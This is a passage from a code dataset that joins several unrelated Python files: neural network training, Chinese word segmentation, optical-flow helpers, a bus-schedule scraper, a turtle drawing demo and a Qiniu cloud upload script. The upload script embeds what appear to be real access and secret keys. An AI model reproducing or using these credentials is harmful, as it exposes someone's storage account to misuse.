return_sequences=True),batch_input_shape = (None,Xtrain.shape[1],Xtrain.shape[2])))\n\t\tmodel.add(Bidirectional(GRU(500,dropout = 0.3,activation='relu', return_sequences=True)))\n\t\tmodel.add(Bidirectional(GRU(250,dropout = 0.3,activation='relu', return_sequences=True)))\n\t\tmodel.add(Bidirectional(GRU(250,dropout = 0.3,activation='relu', return_sequences=True)))\n\t\tmodel.add(TimeDistributed(Dense(39,activation='softmax')))\n\n\telif name == model_name[1]:\n\t\tmodel = Sequential()\n\t\tprint('Building 
model.')\n\t\tmodel.add(Bidirectional(GRU(500,dropout = 0.25,activation='relu', return_sequences=True),batch_input_shape = (None,Xtrain.shape[1],Xtrain.shape[2])))\n\t\tmodel.add(Bidirectional(GRU(500,dropout = 0.25,activation='relu', return_sequences=True)))\n\t\tmodel.add(TimeDistributed(Dense(1000,activation='relu')))\n\t\tmodel.add(Dropout(0.5))\n\t\tmodel.add(TimeDistributed(Dense(1000,activation='relu')))\n\t\tmodel.add(Dropout(0.5))\n\t\tmodel.add(TimeDistributed(Dense(39,activation='softmax')))\n\n\telif name == model_name[2]:\n\t\tmodel = Sequential()\n\t\tprint('Building model.')\n\t\tmodel.add(Bidirectional(GRU(500,activation='relu', return_sequences=True),batch_input_shape = (None,Xtrain.shape[1],Xtrain.shape[2])))\n\t\tmodel.add(Bidirectional(GRU(500,activation='relu', return_sequences=True)))\n\t\tmodel.add(Bidirectional(GRU(500,activation='relu', return_sequences=True)))\n\t\tmodel.add(Bidirectional(GRU(500,activation='relu', return_sequences=True)))\n\t\tmodel.add(TimeDistributed(Dense(1000,activation='relu')))\n\t\tmodel.add(Dropout(0.25))\n\t\tmodel.add(TimeDistributed(Dense(39,activation='softmax')))\n\n\tadam = Adam(lr=0.001,decay=1e-6,clipvalue=0.5)\n\tmodel.compile(loss='categorical_crossentropy',\n\t optimizer='adam',\n\t metrics=['accuracy'])\n\twith open(\"model/%s.json\" % name, 'w') as f:\n\t\tjson.dump(model.to_json(), f)\n\n\tmodel.summary()\n\tearlystopping = EarlyStopping(monitor='val_loss', patience = 7, verbose=1, mode='min')\n\tcheckpoint = ModelCheckpoint(filepath=\"model/%s_model_weight.hdf5\" % name,\n\t verbose=1,\n\t save_best_only=True,\n\t save_weights_only=True,\n\t monitor='val_loss',\n\t mode='min')\n\treturn model,earlystopping,checkpoint,name\n\ndef fit(model,earlystopping,checkpoint,name):\n\thist = model.fit(Xtrain, Ytrain, \n validation_data=(Xval, Yval),\n epochs=nb_epoch, \n batch_size=nb_batch,\n callbacks=[earlystopping,checkpoint])\n\n\tif not (os.path.exists(\"history/\")):\n\t\tos.makedirs(\"history/\")\n\tpkl.dump(hist, open(\"history/%s.pkl\" % name,'wb'), pkl.HIGHEST_PROTOCOL)\n\n\tmodel.load_weights(\"model/%s_model_weight.hdf5\" % name)\n\n\tscore = model.evaluate(Xval, Yval)\n\n\t#print(score)\n\treturn score\n\nfor i in range(0,3):\n\tmodel,earlystopping,checkpoint,name = get_model(model_name[i])\n\tprint( fit(model,earlystopping,checkpoint,name) )\n","sub_path":"hw1/model_best.py","file_name":"model_best.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"123826617","text":"import fool\n#fool里有初始定义文件:init.py: [\"load_model\", \"cut\", \"pos_cut\", \"ner\", \"analysis\", \"load_userdict\", \"delete_userdict\"]\n#load_model(): 加载分词训练模型\n\n\ntext = \"一个傻子在北京\"\nprint(fool.cut(text))\n\n\n\n\n#用户可自定义辞典,词的权重越高,词的长度越长就越越可能出现, 权重值请大于1\nfool.load_userdict('/Users/jiweilu/Desktop/1.txt')\ntext = [\"我在北京天安门看你难受香菇\", \"我在北京晒太阳你在非洲看雪\"]\n\nprint(fool.cut(text))\n\nfool.load_userdict('/Users/jiweilu/Desktop/1.txt')\ntext = [\"我在北京天安门看你难受香菇\", \"我在北京晒太阳你在非洲看雪\"]\nprint(fool.cut(text))\n\nfool.load_userdict('/Users/jiweilu/Desktop/2.txt')\ntext = [\"我在北京天安门看你难受香菇\", \"我在北京晒太阳你在非洲看雪\"]\n#[['我', '在', '北京天安门', '看', '你', '难受', '香菇'],\n# ['我', '在', '北京', '晒太阳', '你', '在', '非洲', '看', '雪']]\nprint(fool.cut(text))\n\n\ntext = [\"一个傻子在北京\"]\nprint(fool.pos_cut(text))\n\n\ntext = [\"一个傻子在北京\",\"你好啊\"]\nwords,ners = fool.analysis(text)\nprint(ners)\n\nners = fool.ner(text)\nprint(\"ners:\", ners)\n\nwords=fool.cut(text, 
ignore=True)\nwords[:6]\nprint(words)\n\n\n\n#[[(5, 8, 'location', '北京')]]\n\n#5 8 表示北京在字符串5-8位置之间,即6和7,见lexial.py的ner函数定义\n\n\n#删除自定义字典;\nfool.delete_userdict();\n","sub_path":"jiweilu1119/FoolNltk/FoolNltk.py","file_name":"FoolNltk.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"44122479","text":"# -*- coding: utf-8 -*-\r\n\r\nimport torch\r\nimport shutil\r\nimport os\r\nimport math\r\nimport numpy as np\r\nfrom torch.autograd import Variable\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import style\r\nfrom numpy import mat\r\nfrom tqdm import tqdm\r\nimport torch.nn.functional as F\r\n\r\ndef folder_train(model_dir, log_dir, args):\r\n model_nets = model_dir + '/' + args.net_name\r\n log_nets = log_dir + '/' + args.net_name\r\n model_nets_time = model_nets + '/' + args.net_time\r\n log_nets_time = log_nets + '/' + args.net_time\r\n if not os.path.exists(model_dir):\r\n os.mkdir(model_dir)\r\n if not os.path.exists(log_dir):\r\n os.mkdir(log_dir)\r\n if not os.path.exists(model_nets):\r\n os.mkdir(model_nets)\r\n if not os.path.exists(log_nets):\r\n os.mkdir(log_nets)\r\n if not os.path.exists(model_nets_time):\r\n os.mkdir(model_nets_time)\r\n if os.path.exists(log_nets_time):\r\n shutil.rmtree(log_nets_time)\r\n os.mkdir(log_nets_time)\r\n return model_nets_time, log_nets_time\r\n\r\ndef folder_test(test_dir,args):\r\n net_dir = test_dir + '/' + args.net_restore\r\n net_time_dir = net_dir + '/' + args.dir_restore + '-' + args.model_restore\r\n if not os.path.exists(test_dir):\r\n os.mkdir(test_dir)\r\n if not os.path.exists(net_dir):\r\n os.mkdir(net_dir)\r\n if not os.path.exists(net_time_dir):\r\n os.mkdir(net_time_dir)\r\n return net_time_dir\r\n\r\ndef to_var(x):\r\n if torch.cuda.is_available():\r\n return Variable(x).cuda()\r\n else:\r\n return Variable(x)\r\n\r\ndef adjust_learning_rate(optimizer, epoch, lr_base, gamma=0.316, epoch_lr_decay=25):\r\n exp = int(math.floor(epoch / epoch_lr_decay))\r\n lr_decay = gamma ** exp\r\n for param_group in optimizer.param_groups:\r\n param_group['lr'] = lr_decay * lr_base\r\n\r\ndef display_t(hour_per_epoch, epoch, args, step, step_per_epoch, optimizer, loss, loss1, loss2,\r\n loss_list, loss1_list, loss2_list, writer, step_global):\r\n print('time:{:.3f} epoch:[{:03d}/{:03d}] step:[{:03d}/{:03d}] lr:{:.7f} loss:{:.4f}({:.4f})={:.4f}({:.4f})+{:d}*{:.4f}({:.4f})'.format(hour_per_epoch, epoch + 1, args.epoch_max, step + 1,\r\n step_per_epoch,optimizer.param_groups[0]['lr'],loss,np.mean(loss_list), loss1,np.mean(loss1_list), args.beta, loss2, np.mean(loss2_list)))\r\n writer.add_scalars('./train-val', {'loss_t': loss, 'loss1_t': loss1, 'loss2_t': loss2}, step_global)\r\n\r\ndef display_v(batch_v, loss_v, loss1_v, loss2_v, args, writer, step_global):\r\n print('{:d}batches loss:{:.4f}={:.4f}+{:d}*{:.4f}'.format(batch_v, loss_v, loss1_v, args.beta, loss2_v))\r\n writer.add_scalars('./train-val', {'loss_v': loss_v, 'loss1_v': loss1_v, 'loss2_v': loss2_v}, step_global)\r\n\r\ndef eulerAnglesToRotationMatrix(theta):\r\n # 欧拉角转换为旋转矩阵\r\n R_x = np.array([[1, 0, 0],\r\n [0, math.cos(theta[0]), -math.sin(theta[0])],\r\n [0, math.sin(theta[0]), math.cos(theta[0])]\r\n ])\r\n\r\n R_y = np.array([[math.cos(theta[1]), 0, math.sin(theta[1])],\r\n [0, 1, 0],\r\n [-math.sin(theta[1]), 0, math.cos(theta[1])]\r\n ])\r\n\r\n R_z = np.array([[math.cos(theta[2]), -math.sin(theta[2]), 0],\r\n 
[math.sin(theta[2]), math.cos(theta[2]), 0],\r\n [0, 0, 1]\r\n ])\r\n\r\n R = np.dot(R_z, np.dot(R_y, R_x))\r\n\r\n return R\r\n\r\ndef relative2absolute(rel):\r\n rel = np.array(rel) #6-d\r\n abl = [] # 12-d\r\n t1 = mat(np.eye(4))\r\n abl.extend([np.array(t1[0: 3, :]).reshape([-1])])\r\n for i in tqdm(range(len(rel))):\r\n x12 = rel[i, 0]\r\n y12 = rel[i, 1]\r\n z12 = rel[i, 2]\r\n theta = np.array([rel[i, 3] / 180 * math.pi,rel[i, 4] / 180 * math.pi,rel[i, 5] / 180 * math.pi])\r\n Rot = eulerAnglesToRotationMatrix(theta)\r\n t12 = np.row_stack((np.column_stack((Rot, [[x12], [y12], [z12]])), [0, 0, 0, 1]))\r\n t2 = t1 * t12\r\n abl.extend([np.array(t2[0: 3, :]).reshape([-1])])\r\n t1 = t2\r\n return np.array(abl)\r\n\r\ndef plot_pose(seq,label_dir, save_dir, pose_abl, epoch=None, args=None):\r\n plt.close('all')\r\n style.use(\"ggplot\")\r\n pose_gt = np.loadtxt(label_dir+'-12d/{:02d}.txt'.format(seq))\r\n pose_pre = np.array(pose_abl)\r\n plt.plot(pose_gt[:, 3], pose_gt[:, 11], '--', c='k', label='Ground Truth')\r\n if args.phase == 'Train':\r\n plt.plot(pose_pre[:, 3], pose_pre[:, 11], '-', c='b', label='model-{:d}'.format(epoch))\r\n else:\r\n plt.plot(pose_pre[:, 3], pose_pre[:, 11], '-', c='r', label=args.model_restore)\r\n plt.title('Sequence {:02d}'.format(seq))\r\n plt.xlabel('x[m]',fontsize=12)\r\n plt.ylabel('z[m]',fontsize=12)\r\n plt.axis('equal')\r\n plt.legend(fontsize=12)\r\n if args.phase == 'Train':\r\n plt.savefig(save_dir+'/{:02d}-epoch-{:d}.png'.format(seq, epoch))\r\n else:\r\n plt.savefig(save_dir + '/{:02d}.png'.format(seq))\r\n\r\ndef EPE(input_flow, target_flow, sparse=False, mean=True):\r\n EPE_map = torch.norm(target_flow-input_flow,2,1)\r\n batch_size = EPE_map.size(0)\r\n if sparse:\r\n mask = (target_flow[:,0] == 0) & (target_flow[:,1] == 0)\r\n EPE_map = EPE_map[~mask]\r\n if mean:\r\n return EPE_map.mean()\r\n else:\r\n return EPE_map.sum()/batch_size\r\n\r\ndef sparse_max_pool(input, size):\r\n positive = (input > 0).float()\r\n negative = (input < 0).float()\r\n output = F.adaptive_max_pool2d(input * positive, size) - F.adaptive_max_pool2d(-input * negative, size)\r\n return output\r\n\r\ndef multiscaleEPE(network_output, target_flow, weights=None, sparse=False):\r\n def one_scale(output, target, sparse):\r\n b, _, h, w = output.size()\r\n if sparse:\r\n target_scaled = sparse_max_pool(target, (h, w))\r\n else:\r\n target_scaled = F.interpolate(target, (h, w), mode='area')\r\n return EPE(output, target_scaled, sparse, mean=False)\r\n if type(network_output) not in [tuple, list]:\r\n network_output = [network_output]\r\n if weights is None:\r\n weights = [0.005, 0.01, 0.02, 0.08, 0.32] # as in original article\r\n assert(len(weights) == len(network_output))\r\n loss = 0\r\n for output, weight in zip(network_output, weights):\r\n loss += weight * one_scale(output, target_flow, sparse)\r\n return loss\r\n\r\ndef realEPE(output, target, sparse=False):\r\n b, _, h, w = target.size()\r\n upsampled_output = F.interpolate(output, (h,w), mode='bilinear', align_corners=False)\r\n return EPE(upsampled_output, target, sparse, mean=True)\r\n\r\ndef make_color_wheel():\r\n \"\"\"\r\n Generate color wheel according Middlebury color code\r\n :return: Color wheel\r\n \"\"\"\r\n RY = 15\r\n YG = 6\r\n GC = 4\r\n CB = 11\r\n BM = 13\r\n MR = 6\r\n\r\n ncols = RY + YG + GC + CB + BM + MR\r\n\r\n colorwheel = np.zeros([ncols, 3])\r\n\r\n col = 0\r\n\r\n # RY\r\n colorwheel[0:RY, 0] = 255\r\n colorwheel[0:RY, 1] = np.transpose(np.floor(255*np.arange(0, RY) / RY))\r\n col += 
RY\r\n\r\n # YG\r\n colorwheel[col:col+YG, 0] = 255 - np.transpose(np.floor(255*np.arange(0, YG) / YG))\r\n colorwheel[col:col+YG, 1] = 255\r\n col += YG\r\n\r\n # GC\r\n colorwheel[col:col+GC, 1] = 255\r\n colorwheel[col:col+GC, 2] = np.transpose(np.floor(255*np.arange(0, GC) / GC))\r\n col += GC\r\n\r\n # CB\r\n colorwheel[col:col+CB, 1] = 255 - np.transpose(np.floor(255*np.arange(0, CB) / CB))\r\n colorwheel[col:col+CB, 2] = 255\r\n col += CB\r\n\r\n # BM\r\n colorwheel[col:col+BM, 2] = 255\r\n colorwheel[col:col+BM, 0] = np.transpose(np.floor(255*np.arange(0, BM) / BM))\r\n col += + BM\r\n\r\n # MR\r\n colorwheel[col:col+MR, 2] = 255 - np.transpose(np.floor(255 * np.arange(0, MR) / MR))\r\n colorwheel[col:col+MR, 0] = 255\r\n\r\n return colorwheel\r\n\r\ndef compute_color(u, v):\r\n \"\"\"\r\n compute optical flow color map\r\n :param u: optical flow horizontal map\r\n :param v: optical flow vertical map\r\n :return: optical flow in color code\r\n \"\"\"\r\n [h, w] = u.shape\r\n img = np.zeros([h, w, 3])\r\n nanIdx = np.isnan(u) | np.isnan(v)\r\n u[nanIdx] = 0\r\n v[nanIdx] = 0\r\n\r\n colorwheel = make_color_wheel()\r\n ncols = np.size(colorwheel, 0)\r\n\r\n rad = np.sqrt(u**2+v**2)\r\n\r\n a = np.arctan2(-v, -u) / np.pi\r\n\r\n fk = (a+1) / 2 * (ncols - 1) + 1\r\n\r\n k0 = np.floor(fk).astype(int)\r\n\r\n k1 = k0 + 1\r\n k1[k1 == ncols+1] = 1\r\n f = fk - k0\r\n\r\n for i in range(0, np.size(colorwheel,1)):\r\n tmp = colorwheel[:, i]\r\n col0 = tmp[k0-1] / 255\r\n col1 = tmp[k1-1] / 255\r\n col = (1-f) * col0 + f * col1\r\n\r\n idx = rad <= 1\r\n col[idx] = 1-rad[idx]*(1-col[idx])\r\n notidx = np.logical_not(idx)\r\n\r\n col[notidx] *= 0.75\r\n img[:, :, i] = np.uint8(np.floor(255 * col*(1-nanIdx)))\r\n\r\n return img\r\n\r\ndef flow_to_image(flow):\r\n \"\"\"\r\n Convert flow into middlebury color code image\r\n :param flow: optical flow map\r\n :return: optical flow image in middlebury color\r\n \"\"\"\r\n u = flow[:, :, 0]\r\n v = flow[:, :, 1]\r\n\r\n maxu = -999.\r\n maxv = -999.\r\n minu = 999.\r\n minv = 999.\r\n UNKNOWN_FLOW_THRESH = 1e7\r\n SMALLFLOW = 0.0\r\n LARGEFLOW = 1e8\r\n\r\n idxUnknow = (abs(u) > UNKNOWN_FLOW_THRESH) | (abs(v) > UNKNOWN_FLOW_THRESH)\r\n u[idxUnknow] = 0\r\n v[idxUnknow] = 0\r\n\r\n maxu = max(maxu, np.max(u))\r\n minu = min(minu, np.min(u))\r\n\r\n maxv = max(maxv, np.max(v))\r\n minv = min(minv, np.min(v))\r\n\r\n rad = np.sqrt(u ** 2 + v ** 2)\r\n maxrad = max(-1, np.max(rad))\r\n\r\n u = u/(maxrad + np.finfo(float).eps)\r\n v = v/(maxrad + np.finfo(float).eps)\r\n\r\n img = compute_color(u, v)\r\n\r\n idx = np.repeat(idxUnknow[:, :, np.newaxis], 3, axis=2)\r\n img[idx] = 0\r\n\r\n return np.uint8(img)\r\n\r\ndef read_flo(of_path):\r\n f = open(of_path, 'rb')\r\n magic = np.fromfile(f, np.float32, count=1)\r\n if 202021.25 != magic:\r\n print ('Magic number incorrect. Invalid .flo file')\r\n else:\r\n w = np.fromfile(f, np.int32, count=1)[0]\r\n h = np.fromfile(f, np.int32, count=1)[0]\r\n data2d = np.fromfile(f, np.float32, count=2 * w * h)\r\n data2d = np.resize(data2d, (h, w, 2))\r\n f.close()\r\n return data2d\r\n\r\ndef read_of(of_path):\r\n f = open(of_path, 'rb')\r\n magic = np.fromfile(f, np.float32, count=1)\r\n if 202021.25 != magic:\r\n print('Magic number incorrect. 
Invalid .flo file')\r\n else:\r\n w = np.fromfile(f, np.int32, count=1)[0]\r\n h = np.fromfile(f, np.int32, count=1)[0]\r\n data2d = np.fromfile(f, np.float32, count=2 * w * h)\r\n flow = np.resize(data2d, (h, w, 2))\r\n f.close()\r\n return flow","sub_path":"evaluate/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":10689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"386656234","text":"\nclass A:\n def __init__(self):\n self.var1 = 3\n self.var2 = 6\n\n def multiple(self):\n score = self.var1 * self.var2\n message = \"Wynikiem działania jest liczba %s\" % score\n print(message)\n\nclass B(A):\n\n def multiple(self):\n score = self.var1/self.var2\n super().multiple()\n print(\"Wyżej wywołało się to co nadpisałem w 'score, funkcja 'multiple' klasy 'A' i \"\n \"i ten komentarz który dodałem\")\na = A()\nB().multiple()","sub_path":"dziedziczenie.py","file_name":"dziedziczenie.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"638283944","text":"#!/usr/bin/env python3\n\"\"\"SHAPICLI Client Utility\n\nThis command line utility accesses the REST interface and is suitable\nfor embedding in shell scripts or other devops utilities.\n\nUsage:\n shapi help [ [--examples] ] [--nobold]\n shapi config\n shapi ping [--config=]\n shapi hal [--config=] [] [--props | --post=]\n shapi shell [--config=]\n shapi login [--config=] \n \nOptions:\n --help Show this screen.\n --config= Path to config file\n --examples Display usage examples [default: False]\n --nobold When true, no terminal output will be bolded, useful for piping [default: False]\n\"\"\"\n\nfrom docopt import docopt\nfrom hyperdns.hapi.sysmgr.cli import SHAPICLI\nimport hyperdns.hal.navigator\nimport urllib.error\n\narguments=docopt(__doc__, version='SHAPICLI Client 1.0')\n\n# load all the commands that are documented in the help above\nbase='hyperdns.hapi.sysmgr.cli'\nfor _cmd in arguments.keys():\n if not (_cmd.startswith(\"-\") or _cmd.startswith(\"<\")):\n mod='%s.cli_%s' % (base,_cmd)\n __import__(mod, fromlist=[base])\n \n# now run the SHAPICLI given the command line\ntry:\n SHAPICLI(arguments,docopt_doc=__doc__)\nexcept urllib.error.URLError as E:\n print(\"Sorry, I can not connect to the configured server\")\nexcept SHAPICLI.BadCall as E:\n code=E.response.status_code\n reason=E.response.reason\n print(\"Sorry, I could do not that - (code %s) - %s\" % (code,reason))","sub_path":"hyperdns/hapi/sysmgr/cli/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"645503052","text":"import turtle\n\n# bob = turtle.Turtle()\n# print(bob)\n# turtle.mainloop()\n# bob.fd(100)\n# bob.lt(90)\n# bob.fd(100)\n# bob.lt(90)\n# bob.fd(100)\n# bob.lt(90)\n# bob.fd(100)\n\n# goku = turtle.Turtle()\n# for i in range(10):\n# goku.fd(100)\n# goku.lt(190)\n# goku.fd(200)\n# goku.lt(100)\n\nvegeta = turtle.Turtle()\ndef square(t):\n for i in range(10):\n t.fd(100)\n t.lt(90)\nsquare(vegeta)","sub_path":"aulas/function-turtle.py","file_name":"function-turtle.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"263561746","text":"from datetime import datetime\nimport pickle\nfrom common_function import *\nfrom random import randint\n\ndef start_solution_1(photos_list):\n 
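# Thin wrapper around solution_1 that measures and reports wall-clock run time\n    # (the input-file index in the log message below is hard-coded to 2).\n    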
start = datetime.now()\n order_slide = solution_1(photos_list)\n stop = datetime.now()\n print(\"Run time: {} for input file {}\".format((stop - start), 2))\n return order_slide\n\n\ndef solution_1(photos_list):\n start_image = randint(0, len(photos_list)-1)\n while photos_list[start_image].orientation != \"V\":\n start_image = randint(0, len(photos_list) - 1)\n unhandle_photos = set(range(len(photos_list)))\n curr_index = start_image\n pieces = []\n handled_photos_in_order = []\n count = 0\n vertical_count = 0\n while len(unhandle_photos) != 0 and curr_index != -1:\n count += 1\n if count % 500 == 0:\n print(\"{} - {} - Processing Image Number {}\".format(datetime.now(), count, curr_index))\n\n unhandle_photos.remove(curr_index)\n handled_photos_in_order.append(photos_list[curr_index])\n\n max_score = -1\n max_index = -1\n for i in unhandle_photos:\n if this_image_must_be_vertical(handled_photos_in_order, photos_list[i]):\n continue\n score = scoring(photos_list[curr_index], photos_list[i])\n if score > max_score:\n max_score = score\n max_index = i\n\n curr_index = max_index\n\n for index, p in enumerate(pieces):\n # print(\"Line: {} - {}\".format(index, [str(i) for i in p]))\n print(\"Line: {} - {}\".format(index, [str(i.orientation) for i in p]))\n\n # Saving to pickle file\n # saveToPickle(\"pieces_\" + str(i) + \".pickle\", pieces)\n return handled_photos_in_order\n\n\ndef this_image_must_be_vertical(handled_photo, image):\n count = 0\n for i in reversed(handled_photo):\n if i.orientation == \"H\":\n break\n count += 1\n\n if count % 2 == 1:\n return image.orientation != \"V\"\n else:\n return False\n\n\ndef saveToPickle(fname, var):\n pickle_out = open(fname, \"wb\")\n pickle.dump(var, pickle_out)\n pickle_out.close()\n","sub_path":"solution_1.py","file_name":"solution_1.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"505109609","text":"from datetime import datetime\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Tag\nfrom typing import List\nfrom enum import Enum\n\nimport logging\nimport requests\nimport re\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"[%(asctime)s] %(levelname)-12s|process:%(process)-5s|thread:%(thread)-5s|funcName:%(funcName)s|message:%(message)s\",\n handlers=[\n # logging.FileHandler('fileName.log'),\n logging.StreamHandler()\n ])\n\n\nclass Location:\n def __init__(self, name: str, url: str):\n self.name = name\n self.location_char = url\n\n def __str__(self):\n return f'Location | name:{self.name} location_char:{self.location_char}'\n\n\nclass Locations(Enum):\n MARINA_RISHHA = Location(\n 'Марьина роща', 'm')\n PLOSHHAD_ILICHA = Location(\n 'Площадь Ильича', 'p')\n RIZHSKAJA = Location('Рижская', 'r')\n\n\nclass Destinations(Enum):\n TO_METRO = 'к метро'\n TO_OFFICE = 'в офис'\n\n\nclass LanitBusInfo:\n @staticmethod\n def get_formated_datetime_text() -> str:\n days = [\"понедельник\", \"вторник\", \"среда\",\n \"четверг\", \"пятница\", \"суббота\", \"воскресенье\"]\n current_datetime = datetime.now()\n formated_current_time = f'{str(current_datetime.hour).zfill(2)}:{str(current_datetime.minute).zfill(2)}'\n return f'Сейчас {days[datetime.today().weekday()]} {formated_current_time}'\n\n @staticmethod\n def get_schedule_info(location: Locations) -> dict:\n logging.info('Get schedule info started...')\n response = requests.get(\n f'https://transport.lanit.ru/{location.value.location_char}/table')\n\n current_datetime = datetime.now()\n 
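# Scrape the fetched timetable page: each 'col-xs-6' block holds one\n        # direction's schedule, and departure times are pulled out below with an\n        # HH:MM regex, e.g. re.findall('([0-9]{2}:[0-9]{2})', '<td>08:30</td>') -> ['08:30'].\n        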
soup = BeautifulSoup(response.text, 'html.parser')\n tables: List[Tag] = soup.findAll(\"div\", {\"class\": \"col-xs-6\"})\n schedule_data = {}\n for table in tables:\n location_tag: Tag = table.find(\n \"div\", {\"class\": \"row text-center\"})\n destination_text = location_tag.text.strip().lower()\n unparsed_time_data = re.findall('([0-9]{2}:[0-9]{2})', str(table))\n parsed_time_data = []\n for bus_time in unparsed_time_data:\n hour, minute = bus_time.split(':')\n bus_datetime = datetime(year=current_datetime.year,\n month=current_datetime.month,\n day=current_datetime.day,\n hour=int(hour),\n minute=int(minute),\n second=0)\n logging.debug(\n f'bus_datetime {type(bus_datetime)} = {bus_datetime}')\n parsed_time_data.append(bus_datetime)\n schedule_data[Destinations(destination_text)] = parsed_time_data\n\n logging.info(f'schedule_data {type(schedule_data)} = {schedule_data}')\n logging.info('Get schedule info completed')\n return schedule_data\n\n @staticmethod\n def get_nearest_bus(location: Locations, destinations: Destinations) -> str:\n logging.info('Getting nearest bus started...')\n current_datetime = datetime.now()\n formated_current_time = f'{current_datetime.hour}:{current_datetime.minute}'\n if datetime.today().weekday() > 4:\n logging.info('Getting nearest bus completed')\n return f'{LanitBusInfo.get_formated_datetime_text()}. Сегодня маршруток {destinations.value} {location.value.name} не будет.'\n else:\n schedule_data = LanitBusInfo.get_schedule_info(location)\n if len(schedule_data[destinations]) > 0:\n for bus_datetime in schedule_data[destinations]:\n if current_datetime < bus_datetime:\n formated_bus_time = f'{str(bus_datetime.hour).zfill(2)}:{str(bus_datetime.minute).zfill(2)}'\n time_difference = bus_datetime - current_datetime\n time_difference_in_minutes = time_difference.total_seconds() / 60\n logging.info('Getting nearest bus completed')\n return f'{LanitBusInfo.get_formated_datetime_text()}. Ближайшая маршрутка {destinations.value} {location.value.name} будет через {time_difference_in_minutes} минут в {formated_bus_time}'\n logging.info('Getting nearest bus completed')\n return f'{LanitBusInfo.get_formated_datetime_text()}. Сегодня маршруток {destinations.value} {location.value.name} уже не будет.'\n else:\n logging.info('Getting nearest bus completed')\n return f'{LanitBusInfo.get_formated_datetime_text()}. 
К сожалению не удалось получить расписание маршруток {destinations.value} {location.value.name}.'\n\n\nif __name__ == \"__main__\":\n print(LanitBusInfo.get_nearest_bus(\n Locations.PLOSHHAD_ILICHA, Destinations.TO_METRO))\n print(LanitBusInfo.get_nearest_bus(\n Locations.MARINA_RISHHA, Destinations.TO_OFFICE))\n","sub_path":"schedule_module.py","file_name":"schedule_module.py","file_ext":"py","file_size_in_byte":5250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"269068525","text":"import sys\nlines = sys.stdin.readlines()\nwrite = sys.stdout.write\ndef solve(n):\n\tif n=='0':\n\t\treturn 'INSOMNIA'\n\tseen=set()\n\tn = int(n)\n\tpre = n\n\twhile len(seen)<10:\n\t\ttmpn =str(n)\n\t\tfor i in range(len(tmpn)):\n\t\t\tseen.add(tmpn[i])\n\t\t#print seen\n\t\tn +=pre\n\t\t#print 'n',n\n\treturn n-pre\n\nt = int(lines[0])\nfor i in range(1,t+1):\n\t#print 'lines',lines[i],type(lines[i])\n\tn=lines[i].replace('\\n','')\n\tres = solve(n)\n\tres = str(res)\n\twrite('Case #%d: %s\\n'%(i,res))","sub_path":"codes/CodeJamCrawler/16_0_1/yangrui/coutingSheep.py","file_name":"coutingSheep.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"632605327","text":"# coding=utf-8\n__author__ = 'jemy'\n'''\n本例演示了一个简单的文件上传。\n\n这个例子里面,sdk根据文件的大小选择是Form方式上传还是分片上传。\n'''\nimport qiniu\n\naccessKey = \"qu0jo7KND2N5zJ2Cc3dRkAwZxQx-fXWvgSBxOTn5\"\nsecretKey = \"bSQ0WZVtVWldyZIkqTxa6GmUBhpKu5dUcZ8WEBTE\"\ninit_bucket = \"hzeng\"\n\n\n# 解析结果\ndef parseRet(retData, respInfo):\n if retData != None:\n print(\"Upload file success!\")\n print(\"Hash: \" + retData[\"hash\"])\n print(\"Key: \" + retData[\"key\"])\n\n # 检查扩展参数\n for k, v in retData.items():\n if k[:2] == \"x:\":\n print(k + \":\" + v)\n\n # 检查其他参数\n for k, v in retData.items():\n if k[:2] == \"x:\" or k == \"hash\" or k == \"key\":\n continue\n else:\n print(k + \":\" + str(v))\n else:\n print(\"Upload file failed!\")\n print(\"Error: \" + respInfo.text_body)\n\n\n# 无key上传,http请求中不指定key参数\ndef upload_without_key(filePath, bucket=None):\n # 生成上传凭证\n if not bucket:\n bucket=init_bucket\n auth = qiniu.Auth(accessKey, secretKey)\n upToken = auth.upload_token(bucket, key=None)\n\n # 上传文件\n retData, respInfo = qiniu.put_file(upToken, None, filePath)\n\n # 解析结果\n parseRet(retData, respInfo)\n\ndef upload(filePath,key, bucket=None):\n # 生成上传凭证\n if not bucket:\n bucket=init_bucket\n auth = qiniu.Auth(accessKey, secretKey)\n upToken = auth.upload_token(bucket, key)\n\n # 上传文件\n retData, respInfo = qiniu.put_file(upToken, key, filePath)\n\n # 解析结果\n parseRet(retData, respInfo)\ndef main():\n filePath = \"image/full/photography/30678383/108343336.jpg\"\n upload(filePath,\"full/photography/30678383/108343336.jpg\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"mm_spider/mm_spider/upload_qiniu.py","file_name":"upload_qiniu.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"652246643","text":"# coding: utf-8\n\n\"\"\"\n Bleumi Pay REST API\n\n A simple and powerful REST API to integrate ERC-20, Ethereum, xDai, Algorand payments and/or payouts into your business or application # noqa: E501\n\n OpenAPI spec version: 1.0.0\n Contact: info@bleumi.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\nimport pprint\nimport re # noqa: F401\n\nimport six\nfrom bleumi_pay.models.payment_addresses 
